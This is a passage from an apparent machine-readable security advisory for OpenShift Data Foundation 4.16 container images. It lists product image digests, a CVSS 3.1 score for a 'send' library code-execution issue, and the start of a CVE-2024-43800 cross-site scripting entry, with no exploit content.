"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", 